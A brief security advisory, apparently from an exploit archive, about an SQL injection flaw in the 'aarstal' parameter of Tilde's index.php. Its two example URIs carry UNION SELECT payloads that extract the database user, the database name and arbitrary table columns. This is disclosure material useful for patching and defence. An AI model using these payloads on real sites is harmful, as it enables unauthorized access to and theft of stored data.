|
Tilde Aarstal Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URIs are available: http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/* |
|
|
Privacy Statement |